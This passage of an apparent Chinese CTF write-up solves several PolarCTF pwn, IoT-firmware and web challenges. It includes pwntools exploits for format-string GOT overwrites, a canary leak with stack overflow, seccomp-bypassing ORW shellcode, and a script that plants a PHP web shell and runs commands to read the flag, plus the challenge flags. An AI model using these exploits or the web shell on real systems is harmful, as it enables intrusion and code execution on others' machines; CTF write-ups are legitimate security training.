\u786e\u8ba4\u504f\u79fb\uff1a\u6d4b\u8bd5\u51fa\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u7684\u504f\u79fb\u91cf\u4e3a 4\u3002\n\u7b2c\u4e00\u6b65 (\u6539\u5199\u53d8\u91cf)\uff1a\u5728 vuln() \u51fd\u6570\u4e2d\uff0c\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5c06\u5168\u5c40\u53d8\u91cf n \u7684\u503c\u4fee\u6539\u4e3a 100\uff0c\u4ece\u800c\u7ed5\u8fc7 if(n == 100) \u7684\u9650\u5236\uff0c\u8fdb\u5165\u4e0b\u4e00\u5c42 back() \u51fd\u6570\u3002\n\u7b2c\u4e8c\u6b65 (GOT\u8868\u52ab\u6301)\uff1a\u5728 back() \u51fd\u6570\u4e2d\u518d\u6b21\u89e6\u53d1\u6f0f\u6d1e\uff0c\u5c06 printf \u7684 GOT \u8868\u5730\u5740\u8986\u5199\u4e3a system \u7684 PLT \u8868\u5730\u5740\u3002\n\u7b2c\u4e09\u6b65 (GetShell)\uff1aback() \u8fd4\u56de\u540e\u6267\u884c door() \u51fd\u6570\u4e2d\u7684 printf(\"\/bin\/sh\")\uff0c\u7531\u4e8e\u6b64\u65f6 printf \u5df2\u7ecf\u88ab\u66ff\u6362\u4e3a system\uff0c\u7a0b\u5e8f\u5b9e\u9645\u6267\u884c system(\"\/bin\/sh\")\uff0c\u6210\u529f\u83b7\u53d6 Shell\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'i386'\ncontext.os = 'linux'\ncontext.log_level = 'debug'\n\nip = '1.95.7.68'\nport = 2115\nbinary_name = '.\/pwn1'\n\nelf = ELF(binary_name)\n\ndef pwn():\n    p = remote(ip, port)\n    offset = 4\n\n    p.recvuntil(b\"hello hacker!n\")\n    n_addr = elf.symbols['n']\n    payload1 = fmtstr_payload(offset, {n_addr: 100})\n    p.send(payload1)\n\n    p.recvuntil(b\"NICE\")\n    printf_got = elf.got['printf']\n    system_plt = elf.plt['system']\n    payload2 = fmtstr_payload(offset, {printf_got: system_plt})\n    p.send(payload2)\n\n    p.interactive()\n\nif __name__ == '__main__':\n    pwn()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{c9fe0d25-9f8a-47c3-b2d2-4774d44fbf39}<\/code><\/pre>\n\n\n\n
bank<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u4f4d\u4e8e bank\u51fd\u6570\u4e2d\u7684 printf(buf)\u3002\u7a0b\u5e8f\u76f4\u63a5\u5c06\u7528\u6237\u8f93\u5165\u7684\u53d8\u91cf\u4f5c\u4e3a printf \u7684\u53c2\u6570\u6253\u5370\uff0c\u4e14\u672a\u5bf9\u5176\u8fdb\u884c\u4efb\u4f55\u683c\u5f0f\u5316\u63a7\u5236\uff08\u6ca1\u6709 %s<\/code> \u7b49\uff09\uff0c\u5bfc\u81f4\u4e86\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u3002<\/p>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u76ee\u6807\u6761\u4ef6\uff1a \u53ea\u8981\u8ba9\u5168\u5c40\u53d8\u91cf money \u7684\u503c\u7b49\u4e8e 9999\uff0c\u4ee3\u7801\u5c31\u4f1a\u81ea\u52a8\u8c03\u7528\u9898\u76ee\u9884\u7559\u7684\u540e\u95e8\u51fd\u6570 shell() \u83b7\u53d6 \/bin\/sh\u3002\n\u5730\u5740\u63d0\u53d6\uff1a \u6839\u636e\u63d0\u4f9b\u7684 IDA \u6c47\u7f16\u4ee3\u7801\uff08\u7b2c 580 \u884c\uff09\uff0c\u5168\u5c40\u53d8\u91cf money \u5b58\u653e\u5728 .bss \u6bb5\uff0c\u5185\u5b58\u5730\u5740\u4e3a 0x0804A06C\u3002\n\u504f\u79fb\u8ba1\u7b97\uff1a \u6c47\u7f16\u4e2d printf \u88ab\u8c03\u7528\u65f6\uff0cbuf \u4f4d\u4e8e ebp-70h\uff0c\u800c\u7b2c\u4e00\u53c2\u6570\u8d77\u59cb\u4f4d\u7f6e\u4f4d\u4e8e ebp-84h\u3002\u4e8c\u8005\u76f8\u8ddd 0x14\uff0820\u5b57\u8282\uff09\uff0c\u9664\u4ee5 4 \u5f97\u5230 5\u3002\u56e0\u6b64\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u7684\u53c2\u6570\u504f\u79fb\u91cf\u4e3a 6\uff085 + 1\uff09\u3002\n\u5229\u7528\u601d\u8def\uff1a \u6211\u4eec\u6784\u9020 [money\u5730\u5740] + %9995c%6$n\u3002\u524d\u9762\u5730\u5740\u5360 4 \u5b57\u8282\uff0c\u540e\u9762 %9995c \u4f1a\u6253\u5370 9995 \u4e2a\u7a7a\u683c\u5b57\u7b26\uff0c\u521a\u597d\u51d1\u591f $4 + 9995 = 9999$ \u5b57\u7b26\u3002\u7136\u540e\u901a\u8fc7 %6$n \u5c06\u5f53\u524d\u5df2\u8f93\u51fa\u7684\u5b57\u7b26\u603b\u6570\uff089999\uff09\u5199\u5165\u5230\u7b2c 6 \u4e2a\u53c2\u6570\u6307\u5411\u7684\u5730\u5740\uff08\u4e5f\u5c31\u662f\u6211\u4eec\u653e\u5728\u5f00\u5934\u7684 money \u5730\u5740\uff09\u4e2d\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext(arch='i386', os='linux', log_level='error')\nio = remote('1.95.7.68', 2093)\n\nio.recvuntil(b\"you put:\")\n\npayload = p32(0x0804A06C) + b\"%9995c%6$n\"\nio.sendline(payload)\n\nio.sendline(b\"cat flag || cat \/flag\")\nprint(io.recvall(timeout=3).decode('utf-8', errors='ignore'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{9c96e02f-e594-4bab-92ff-8609f837aab9}<\/code><\/pre>\n\n\n\n
sandbox1<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u5728 main \u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7a0b\u5e8f\u76f4\u63a5\u5c06\u7528\u6237\u8f93\u5165\u8bfb\u53d6\u5230\u6808\u4e0a\u7684\u5c40\u90e8\u53d8\u91cf\u6570\u7ec4\u4e2d\uff0c\u5e76\u5c06\u5176\u5f3a\u5236\u8f6c\u6362\u4e3a\u51fd\u6570\u6307\u9488\u76f4\u63a5\u8df3\u8f6c\u6267\u884c\uff08\u4efb\u610f Shellcode \u6267\u884c\u6f0f\u6d1e\uff09\u3002<\/p>\n\n\n\n
\u4fdd\u62a4\u673a\u5236\u5206\u6790\uff1a \u7a0b\u5e8f\u5728\u521d\u59cb\u5316\u65f6\u8c03\u7528\u4e86 sandbox() \u51fd\u6570\uff08\u901a\u8fc7 seccomp \u5b9e\u73b0\uff09\uff0c\u7981\u7528\u4e86 execve\uff08\u7cfb\u7edf\u8c03\u7528\u53f711\uff09\uff0c\u8fd9\u610f\u5473\u7740\u65e0\u6cd5\u5e38\u89c4\u83b7\u53d6 \/bin\/sh\uff0c\u53ea\u80fd\u5229\u7528\u88ab\u5141\u8bb8\u7684 open(5)\u3001read(3)\u3001write(4) \u7cfb\u7edf\u8c03\u7528\u3002\n\n\u5229\u7528\u601d\u8def\uff1a \u6784\u9020 ORW (Open-Read-Write) \u7c7b\u578b\u7684 Shellcode\uff0c\u4f7f\u5176\u6309\u987a\u5e8f\u6267\u884c\uff1a\u6253\u5f00 \/flag -> \u8bfb\u5165\u5185\u5b58 -> \u6253\u5370\u5230\u5c4f\u5e55\u3002\n\n\u6838\u5fc3\u5751\u70b9\uff08Stack \u8986\u76d6\uff09\uff1a \u7531\u4e8e\u6211\u4eec\u8f93\u5165\u7684 Shellcode \u4f4d\u4e8e\u6808\u9876\u9644\u8fd1\uff0c\u5f53 Shellcode \u6267\u884c read \u64cd\u4f5c\u5c06 flag \u5185\u5bb9\u5199\u5165 esp \u65f6\uff0c\u7531\u4e8e\u6808\u5411\u4e0a\u7684\u751f\u957f\u7279\u6027\uff0c\u8bfb\u53d6\u7684 flag \u6570\u636e\u4f1a\u8986\u76d6\u6389\u6b63\u5728\u6267\u884c\u7684 Shellcode \u672c\u8eab\u5bfc\u81f4\u5d29\u6e83\u3002\u56e0\u6b64\uff0c\u5fc5\u987b\u5728 Shellcode \u5f00\u5934\u52a0\u4e0a sub esp, 0x100 \u62ac\u9ad8\u6808\u9876\uff0c\u5f00\u8f9f\u4e00\u6bb5\u5b89\u5168\u7684\u5185\u5b58\u7a7a\u95f4\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext(arch='i386', os='linux', log_level='error')\n\nHOST = '1.95.7.68'\nPORT = 2138\nio = remote(HOST, PORT)\n\nio.recvuntil(b\"magic box!\")\n\nsc = '''\n    sub esp, 0x100\n'''\nsc += shellcraft.open('\/flag')\nsc += shellcraft.read('eax', 'esp', 0x100)\nsc += shellcraft.write(1, 'esp', 0x100)\n\nshellcode = asm(sc)\nio.sendline(shellcode)\n\nresult = io.recvall(timeout=3)\nprint(result.decode('utf-8', errors='ignore'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{6581839d-c39e-4e5e-bcb8-353736f87447}<\/code><\/pre>\n\n\n\n
littlecan<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u4f4d\u4e8e vuln \u51fd\u6570\uff0c\u5305\u542b \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u548c \u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5206\u6790<\/p>\n\n\n\n
\u8fdb\u5165\u95e8\u69db (main): read(0, buf, 4u) \u5e76\u5728 buf[1] > 102\uff08\u5b57\u7b26 'f'\uff09\u65f6\u8c03\u7528 vuln()\u3002\u8f93\u5165 agxx \u5373\u53ef\u7ed5\u8fc7\u3002\n\u683c\u5f0f\u5316\u5b57\u7b26\u4e32 (vuln): \u5faa\u73af\u6267\u884c\u4e24\u6b21 read \u548c printf(buf)\u3002\u7531\u4e8e\u6ca1\u6709\u683c\u5f0f\u5316\u63a7\u5236\u7b26\uff0c\u5229\u7528\u7b2c\u4e00\u6b21\u5faa\u73af\u8f93\u5165 %31$p \u53ef\u6cc4\u9732 Canary\u3002\n\u6808\u6ea2\u51fa (vuln): buf \u5927\u5c0f\u4e3a 100\uff0c\u4f46 read(0, buf, 0x100u) \u5141\u8bb8\u8bfb\u5165 256 \u5b57\u8282\u3002\n\u540e\u95e8: \u9898\u76ee\u81ea\u5e26 yes() \u51fd\u6570\uff0c\u5730\u5740\u4e3a 0x08048621\uff0c\u5185\u542b system(\"\/bin\/sh\")\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext(arch='i386', os='linux', log_level='error')\nio = remote('1.95.7.68', 2093)\n\nio.recvuntil(b\"This is a good start!n\")\nio.send(b\"agxx\")\n\nio.send(b\"%31$pnx00\")\nio.recvuntil(b\"0x\")\ncanary = int(io.recvline().strip(), 16)\n\npayload = b\"A\" * 100 + p32(canary) + b\"B\" * 12 + p32(0x08048621)\nio.send(payload)\n\nio.sendline(b\"cat flag || cat \/flag\")\nprint(io.recvall(timeout=3).decode('utf-8', errors='ignore'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{84949533-0c63-49e1-988b-2a0985d6a2f0}<\/code><\/pre>\n\n\n\n
PloTS<\/h1>\n\n\n\n
polarble<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9759\u6001\u89e3\u6cd5<\/p>\n\n\n\n
\u6709\u4e86\u56fa\u4ef6\u7684\u5b8c\u6574 Dump\uff0c\u5b8c\u5168\u4e0d\u9700\u8981\u786c\u4ef6\u677f\u5b50\uff0c\u53ef\u4ee5\u76f4\u63a5\u4ece\u4e8c\u8fdb\u5236\u6570\u636e\u4e2d\u628a flag \u6316\u51fa\u6765\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5c06 1.bin \u62d6\u5165 010 Editor\uff0c\u641c\u7d22\u6587\u672c\u6216\u6d4f\u89c8\u7279\u5f81\uff0c\u5728 1:01F0h \u5904\u53d1\u73b0\u660e\u6587\u63d0\u793a\uff1aBLE CTF ready (xor-protected)\u3002\u660e\u786eFlag\u88ab\u5f02\u6216\u52a0\u5bc6\u3002\n\u5728\u4e0b\u65b9 1:02C0h \u9644\u8fd1\u53d1\u73b0\u4e00\u6bb5\u53ef\u7591\u7684\u5341\u516d\u8fdb\u5236\u5bc6\u6587\uff1a3C 36 3B 3D 21 32 3B 33 20 33 34 33 2D 2F 3E 33 36 3F 27\u3002\n\u5df2\u77e5Flag\u6807\u51c6\u683c\u5f0f\u4e3a flag{\uff0c\u7528\u5bc6\u6587\u524d5\u4e2a\u5b57\u8282\u4e0e\u660e\u6587\u8fdb\u884c\u5f02\u6216\u63a8\u5bfc\uff1a\n0x3C ^ 0x66 ('f') = 0x5A\n0x36 ^ 0x6C ('l') = 0x5A\n\u63a8\u5bfc\u51fa\u5355\u5b57\u8282\u5bc6\u94a5\u4e3a 0x5A\u3002\n\u5199\u811a\u672c\u89e3\u5bc6\u8fd9\u4e32\u5341\u516d\u8fdb\u5236\u5373\u53ef\u3002<\/code><\/pre>\n\n\n\n
\u6709\u70b9\u6295\u673a\u53d6\u5de7\u4e86<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
hex_str = \"3C 36 3B 3D 21 32 3B 33 20 33 34 33 2D 2F 3E 33 36 3F 27\"\nenc_bytes = bytes.fromhex(hex_str)\nxor_key = 0x5A\n\nflag = \"\".join(chr(b ^ xor_key) for b in enc_bytes)\n\nprint(\"--- (PolarBLE)  ---\")\nprint(f\"[+] \u4ece\u63d0\u53d6\u7684\u5341\u516d\u8fdb\u5236\u89e3\u5bc6\u5f97\u5230 Flag: {flag}\")\nprint(\"-\" * 35)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{haiziniwudile}<\/code><\/pre>\n\n\n\n
\u5b9e\u4e60\u751fflashrom<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u8981\u6c42\u63d0\u53d6\u7684\u662f\u201c\u9a8c\u8bc1\u5f00\u9501\u7684\u6700\u7ec8\u53e3\u4ee4\u201d\uff08\u667a\u80fd\u95e8\u9501\u7684\u4e3b\u5bc6\u94a5Master Key\uff09\uff0c\u800c\u4e0d\u662f\u89e3\u5f00 unlocker.py<\/code> \u5de5\u5177\u7684\u5bc6\u7801\u3002<\/p>\n\n\n\n
\u5ba1\u8ba1 unlocker.py<\/code> \u6e90\u7801\uff0c\u5173\u6ce8\u5199\u5165\u56fa\u4ef6\u7684 _make_blob()<\/code> \u51fd\u6570\u3002<\/p>\n\n\n\n
\u8be5\u51fd\u6570\u6784\u9020\u4e86\u4e00\u4e2a\u6a21\u62df\u7684\u6587\u4ef6\u7cfb\u7edf\uff08\u5305\u542b\u914d\u7f6e\u6587\u4ef6\u548cshell\u811a\u672c\uff09\uff0c\u5176\u4e2d\u5b9a\u4e49\u4e86\u5bc6\u94a5\u7684\u62fc\u63a5\u903b\u8f91\uff1a<\/p>\n\n\n\n
PART_A=\"zhi_ma_\"\nkey_part_b=\"neng_bu_neng\"\nPART_C=\"_kai_men\"\nMASTER_KEY=\"${PART_A}${key_part_b}${PART_C}\"<\/code><\/pre>\n\n\n\n
\u62fc\u63a5\u63d0\u53d6\u51fa\u7684\u4e09\u4e2a\u5b57\u7b26\u4e32\uff0c\u5373\u53ef\u5f97\u5230\u6700\u7ec8\u5f00\u95e8flag\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
part_a = \"zhi_ma_\"\nkey_part_b = \"neng_bu_neng\"\npart_c = \"_kai_men\"\n\nmaster_key = part_a + key_part_b + part_c\nprint(f\"flag{{{master_key}}}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{zhi_ma_neng_bu_neng_kai_men}<\/code><\/pre>\n\n\n\n
bllbl_xmpp<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89e3\u9898\u601d\u8def\uff1a<\/p>\n\n\n\n
\u9898\u76ee\u63d0\u793a\u5c06\u56fa\u4ef6\u70e7\u5f55\u5230 ESP32 \u5f00\u53d1\u677f\u8fdb\u884c\u5b9e\u673a\u8c03\u8bd5\u3002\u5982\u679c\u6ca1\u6709\u786c\u4ef6\u677f\u5b50\uff0c\u53ef\u76f4\u63a5\u91c7\u7528\u9759\u6001\u5206\u6790\u3002\n\u56fa\u4ef6\u4e2d\u5305\u542b\u4e86\u5927\u91cf\u7684\u5e95\u5c42\u7f51\u7edc\u534f\u8bae\u5e93\uff08\u5982 lwIP\uff09\uff0c\u76f4\u63a5\u5728\u4e8c\u8fdb\u5236\u6587\u4ef6\u4e2d\u641c\u7d22 flag \u4f1a\u5339\u914d\u5230\u5927\u91cf\u5982 pcb->flags \u7684\u5e72\u6270\u9879\u4ee3\u7801\u3002\n\u8c03\u6574\u601d\u8def\uff0c\u641c\u7d22 PolarCTF\u3001WIFI \u7b49\u9898\u76ee\u7279\u5f81\u76f8\u5173\u7684\u660e\u6587\u5b57\u7b26\u4e32\u3002\n\u53d1\u73b0\u56fa\u4ef6\u7684 .rodata \u6570\u636e\u6bb5\u4e2d\u786c\u7f16\u7801\u4e86\u4e00\u4e2a Web \u63a7\u5236\u53f0\u7684 HTML \u9875\u9762\u6e90\u7801\u548c\u70ed\u70b9 SSID (PolarCTF_IoT_WIFI)\u3002\n\u63d0\u53d6 PolarCTF \u4e0a\u4e0b\u6587\u7684\u5b8c\u6574\u5b57\u7b26\u4e32\uff0c\u5373\u53ef\u5728 HTML \u5c3e\u90e8\u53d1\u73b0\u771f\u5b9e\u7684 flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import re\n\nwith open(\"bllbl_xmpp.bin\", \"rb\") as f:\n    data = f.read()\n\nfor m in re.finditer(b'PolarCTF', data):\n    start = max(0, m.start() - 50)\n    end = min(len(data), m.end() + 200)\n    snippet = data[start:end].decode('ascii', errors='ignore')\n\n    if '<\/div>' in snippet or '<h2>' in snippet:\n        print(snippet)\n        print(\"-\" * 60)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{polarctf_iot_oo}<\/code><\/pre>\n\n\n\n
wifi\u9493flag<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u57fa\u672c\u5206\u6790\uff1a\u9898\u76ee\u63d0\u793a\u8bbe\u5907\u8fde\u63a5 Starbucks_WiFi \u5e76\u5411 \/login \u63d0\u4ea4 pwd\u3002\u9759\u6001\u5206\u6790 client.bin \u53d1\u73b0 pwd= \u540e\u65e0\u660e\u6587\uff0c\u4e14\u65e5\u5fd7\u5b58\u5728 Sending encrypted-decoded payload\uff0c\u786e\u8ba4 flag \u5728\u5185\u5b58\u4e2d\u52a8\u6001\u89e3\u5bc6\u3002\n\u9006\u5411\u5b9a\u4f4d\uff1a\u4f7f\u7528 IDA Pro (\u5b89\u88c5 Xtensa \u63d2\u4ef6) \u52a0\u8f7d\u56fa\u4ef6\u3002\u4ea4\u53c9\u5f15\u7528 \/login \u6216 pwd= \u5b57\u7b26\u4e32\uff0c\u5b9a\u4f4d\u5230\u53d1\u5305\u903b\u8f91\u51fd\u6570\u3002\n\u7b97\u6cd5\u8fd8\u539f\uff1a\u5728\u5730\u5740 0x400d27a8 \u5904\u53d1\u73b0\u6838\u5fc3\u89e3\u5bc6\u5faa\u73af\u3002\u63d0\u53d6\u5173\u952e\u53c2\u6570\uff1a\n\u5bc6\u6587\u57fa\u5740\uff1a0x3f414871\n\u5bc6\u94a5\u57fa\u5740\uff1a0x3f414895\uff0c\u63d0\u53d6\u503c\u4e3a k3y42\n\u5faa\u73af\u6b21\u6570\uff08\u957f\u5ea6\uff09\uff1a36\u5b57\u8282\n\u63d0\u53d6\u903b\u8f91\uff1a\u5206\u6790\u6c47\u7f16\u8fd8\u539f\u6d41\u5bc6\u7801\u8fd0\u7b97\u903b\u8f91\uff1aout[i] = src[i] ^ key[i%5] ^ ((7 + 13 * i) & 0xff)\u3002\n\u89e3\u5bc6\u8f93\u51fa\uff1a\u4f7f\u7528 Python \u904d\u5386\u6587\u4ef6\u6267\u884c\u89e3\u5bc6\u7b97\u6cd5\uff0c\u76f4\u63a5\u547d\u4e2d\u5e76\u8f93\u51fa\u660e\u6587 Flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import os\n\ndef solve():\n    with open('client.bin', 'rb') as f:\n        data = f.read()\n\n    key = b'k3y42'\n\n    for offset in range(len(data) - 36):\n        src = data[offset:offset+36]\n        out = bytearray(36)\n\n        for i in range(36):\n            out[i] = src[i] ^ key[i % 5] ^ ((7 + 13 * i) & 0xFF)\n\n        if b'polar{' in out or b'flag{' in out:\n            print(out.decode('ascii', errors='ignore'))\n            break\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{dasidiu2214bdidsad1234bs98asdb}<\/code><\/pre>\n\n\n\n
\u6df7\u4e71\u7684\u6ce2\u7279\u7387<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u672c\u9898\u8868\u9762\u662f\u8003\u5bdf\u4e32\u53e3\u6ce2\u7279\u7387\u8c03\u8bd5\uff08\u6839\u636e\u516c\u5f0f 80000000\/153456\u224852580000000\/153456\u2248525 \u7b97\u51fa\u771f\u5b9e\u6ce2\u7279\u7387\u4e3a 153456<\/code>\uff09\uff0c\u4f46\u5b9e\u9645\u4e0a\u8fd9\u662f\u4e00\u9053ESP32 \u56fa\u4ef6\u9759\u6001\u5206\u6790\u9898\u3002<\/p>\n\n\n\n
\u6587\u4ef6 1.bin<\/code> \u662f\u5b8c\u6574\u7684 ESP32 flash dump\u3002\u4e3b\u7a0b\u5e8f app0<\/code> \u5206\u533a\u901a\u5e38\u4f4d\u4e8e\u504f\u79fb 0x10000<\/code> \u5904\u3002<\/p>\n\n\n\n
\u52a0\u5bc6\u6570\u636e<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728\u56fa\u4ef6\u4e2d\u641c\u7d22 FLAG{ \u5b57\u7b26\u4e32\uff0c\u89c2\u5bdf\u5176\u524d\u540e\u7684\u5341\u516d\u8fdb\u5236\u6570\u636e\u7ed3\u6784\uff0c\u53d1\u73b0\u660e\u663e\u7684\u89c4\u5f8b\uff1a\n\nFLAG{ \u524d\u7684 16 \u5b57\u8282\uff1a18 78 28 1e 39 ...\uff0c\u7591\u4f3c\u88ab\u5f02\u6216\u52a0\u5bc6\u7684\u5bc6\u94a5\uff08Key\uff09\u3002\nFLAG{ \u540e\u7684 16 \u5b57\u8282\uff1a37 52 08 39 18 ...\uff0c\u5373\u771f\u6b63\u7684\u52a0\u5bc6 Flag \u5185\u5bb9\uff08\u5bc6\u6587\uff09\u3002<\/code><\/pre>\n\n\n\n
\u5bc6\u94a5\u4e0e\u660e\u6587\u8fd8\u539f<\/p>\n\n\n\n
\u63d0\u53d6\u771f\u5bc6\u94a5\uff1a\u5bf9 FLAG{ \u524d\u7684 16 \u5b57\u8282\u8fdb\u884c\u5355\u5b57\u8282 XOR \u7206\u7834\u3002\u5f53\u5f02\u6216\u5b57\u8282\u4e3a 0x4b \u65f6\uff0c\u5f97\u5230\u5b8c\u5168\u7531\u53ef\u89c1\u5b57\u7b26\u7ec4\u6210\u7684\u771f\u5b9e\u5bc6\u94a5\uff1aS3cUr3_XOR_key!!\u3002\n\u89e3\u5bc6 Flag\uff1a\u5c06\u63d0\u53d6\u5230\u7684\u771f\u5b9e\u5bc6\u94a5 S3cUr3_XOR_key!! \u4e0e FLAG{ \u540e\u9762\u7684 16 \u5b57\u8282\u5bc6\u6587\u8fdb\u884c\u9010\u5b57\u8282 XOR \u5f02\u6216\uff0c\u5373\u53ef\u8fd8\u539f\u51fa\u660e\u6587 dakljwlj_dlaoskw\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
with open(\"1.bin\", \"rb\") as f:\n    flash = f.read()\n\napp0 = flash[0x10000:0x150000]\nidx = app0.find(b\"FLAG{\")\n\nenc_key = app0[idx - 16:idx]\n\nxor_byte = None\nreal_key = None\nfor k in range(256):\n    dec = bytes([x ^ k for x in enc_key])\n    if all(32 <= c < 127 for c in dec) and b\"key\" in dec.lower():\n        xor_byte = k\n        real_key = dec\n        break\n\nenc_flag = app0[idx + 5:idx + 5 + 16]\nplain = bytes([a ^ b for a, b in zip(enc_flag, real_key)])\n\nprint((b\"FLAG{\" + plain + b\"}\").decode())<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
FLAG{dakljwlj_dlaoskw}<\/code><\/pre>\n\n\n\n
Web<\/h1>\n\n\n\n
\u65b0\u5e74\u8d3a\u5361<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u6e90\u7801\u5ba1\u8ba1\u5c31\u884c<\/p>\n\n\n\n
\u6f0f\u6d1e\u5206\u6790\uff1a\n\u5ba1\u8ba1 index.php \u6e90\u7801\uff0c\u53d1\u73b0\u5b58\u5728\u9690\u85cf\u7684\u8def\u7531 action=admin\u3002\u901a\u8fc7\u4f20\u53c2 debug=add_template \u53ef\u4ee5\u8fdb\u5165\u6dfb\u52a0\u6a21\u677f\u7684\u5206\u652f\u3002\n\u6838\u5fc3\u6f0f\u6d1e\u70b9\u5728\u4e8e\u63a5\u6536 POST \u53c2\u6570 template_name \u548c template_content \u540e\uff0c\u76f4\u63a5\u8c03\u7528 TemplateManager::addTemplate($name, $content);\u3002\u8be5\u51fd\u6570\u672a\u5bf9\u5185\u5bb9\u8fdb\u884c\u5b89\u5168\u8fc7\u6ee4\uff0c\u76f4\u63a5\u5c06\u4f20\u5165\u7684\u5185\u5bb9\u4fdd\u5b58\u4e3a .php \u6587\u4ef6\u3002\n\n\u540e\u7eed\u5728\u8c03\u7528 action=generate \u63a5\u53e3\u751f\u6210\u8d3a\u5361\u65f6\uff0c\u4f20\u5165\u521a\u5199\u5165\u7684\u6076\u610f\u6a21\u677f\u540d\u79f0\uff0c\u7cfb\u7edf\u4f1a\u89e3\u6790\/\u5305\u542b\u8be5 PHP \u6587\u4ef6\uff0c\u4ece\u800c\u89e6\u53d1\u4ee3\u7801\u6267\u884c\u3002<\/code><\/pre>\n\n\n\n
\u5229\u7528\u601d\u8def\uff1a<\/p>\n\n\n\n
POST \u8bf7\u6c42 \/?action=admin&debug=add_template\uff0c\u5199\u5165\u5305\u542b\u4e00\u53e5\u8bdd\u6728\u9a6c\u7684 PHP \u6a21\u677f\u6587\u4ef6\u3002\nPOST \u8bf7\u6c42 \/?action=generate\uff0c\u6307\u5b9a template \u4e3a\u521a\u5199\u5165\u7684\u6a21\u677f\u540d\uff0c\u5e76\u4f20\u5165\u6267\u884c\u547d\u4ee4\u7684\u53c2\u6570\u83b7\u53d6 flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\nimport re\nimport random\nimport string\n\nURL = \"http:\/\/ad3c0e1a-8c41-4865-85d7-17ec765091b7.game.polarctf.com:8090\/\"\n\ndef solve():\n    session = requests.Session()\n    tpl_name = \"hack_\" + \"\".join(random.choices(string.ascii_lowercase + string.digits, k=5))\n\n    php_payload = \"<?php echo '---START---'; system($_POST['cmd']); echo '---END---'; die(); ?>\"\n\n    add_url = URL.rstrip(\"\/\") + \"\/?action=admin&debug=add_template\"\n    add_data = {\n        \"template_name\": tpl_name,\n        \"template_content\": php_payload\n    }\n\n    try:\n        session.post(add_url, data=add_data, timeout=5)\n    except Exception:\n        pass\n\n    trigger_url = URL.rstrip(\"\/\") + \"\/?action=generate\"\n\n    def execute_cmd(command):\n        trigger_data = {\n            \"template\": tpl_name,\n            \"message\": \"hello\",\n            \"cmd\": command\n        }\n        try:\n            r = session.post(trigger_url, data=trigger_data, timeout=5)\n            match = re.search(r\"---START---(.*?)---END---\", r.text, re.DOTALL)\n            if match:\n                return match.group(1).strip()\n            return None\n        except Exception:\n            return None\n\n    cmds = [\"ls -la \/\", \"cat \/flag.txt\"]\n\n    for cmd in cmds:\n        print(f\"[*] Executing: {cmd}\")\n        output = execute_cmd(cmd)\n        if output:\n            print(output)\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{09328acfbc035a4e69a710f71eab8a5c}<\/code><\/pre>\n\n\n\n
static<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
php\u4f2a\u534f\u8bae<\/p>\n\n\n\n
